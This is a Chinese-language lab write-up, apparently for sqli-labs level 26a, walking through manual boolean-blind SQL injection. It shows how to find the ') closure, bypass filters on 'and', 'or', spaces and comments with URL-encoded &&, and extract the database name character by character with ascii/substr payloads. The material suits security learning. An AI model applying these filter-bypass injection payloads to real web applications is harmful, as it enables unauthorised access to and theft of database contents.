5.26a.第26a关 get布尔盲注 过滤or和and基础上又过滤了空格和注释符 ')闭合
5.26a.1.手动注入
(1)判断注入类型、注入点
?id=2' 报错,字符型注入,判断'闭合
?id=2'%26%26'1'='1 返回id=1数据,判断不是'闭合
?id=2')%26%26'1'=('1 返回id=2数据,确定是')闭合
(2)猜解数据库长度
没有报错回显,不能用报错注入,用布尔盲注
id=2')&&length(database())=8&&'1'=('1
使用&&替代and
&转义%26
?id=2')%26%26length(database())=8%26%26'1'=('1
(3)利用ascii猜解数据库名
substr(string, start, length) 字符串截取函数
string是要处理的字符串
start是开始位置(从1开始计数)
length是要截取的长度
ascii() 返回字符ascii码
大写字母范围:65 (A) ~ 90 (Z)→ 连续递增,无间隔
小写字母范围:97 (a) ~ 122 (z)→ 连续递增,无间隔,大小写差值:3226个小写字母ascii值
a97 h104 o111 v118
b98 i105 p112 w119
c99 j106 q113 x120
d100 k107 r114 y121
e101 l108 s115 z122
f102 m109 t116
g103 n110 u117 大写-32?id=2')%26%26(ascii(substr(database(),1,1)))>100%26%26'1'=('1 正常回显
?id=2')%26%26(ascii(substr(database(),1,1)))>200%26%26'1'=('1 空
?id=2')%26%26(ascii(substr(database(),1,1)))>150%26%26'1'=('1 空
?id=2')%26%26(ascii(substr(database(),1,1)))>125%26%26'1'=('1 空
?id=2')%26%26(ascii(substr(database(),1,1)))>112%26%26'1'=('1 正常回显
?id=2')%26%26(ascii(substr(database(),1,1)))>120%26%26'1'=('1 空
?id=2')%26%26(ascii(substr(database(),1,1)))>116%26%26'1'=('1 空
?id=2')%26%26(ascii(substr(database(),1,1)))=115%26%26'1'=('1 正常回显,数据库名第1个字母为s
?id=2')%26%26(ascii(substr(database(),2,1)))=101%26%26'1'=('1 正常回显,数据库名第2个字母为e
?id=2')%26%26(ascii(substr(database(),3,1)))=99%26%26'1'=('1 正常回显,数据库名第3个字母为c
?id=2')%26%26(ascii(substr(database(),4,1)))=117%26%26'1'=('1 正常回显,数据库名第4个字母为u
?id=2')%26%26(ascii(substr(database(),5,1)))=114%26%26'1'=('1 正常回显,数据库名第5个字母为r
?id=2')%26%26(ascii(substr(database(),6,1)))=105%26%26'1'=('1 正常回显,数据库名第6个字母为i
?id=2')%26%26(ascii(substr(database(),7,1)))=116%26%26'1'=('1 正常回显,数据库名第7个字母为t
?id=2')%26%26(ascii(substr(database(),8,1)))=121%26%26'1'=('1 正常回显,数据库名第8个字母为y
?id=2')%26%26(ascii(substr(database(),9,1)))=96%26%26'1'=('1 空
数据库名为security
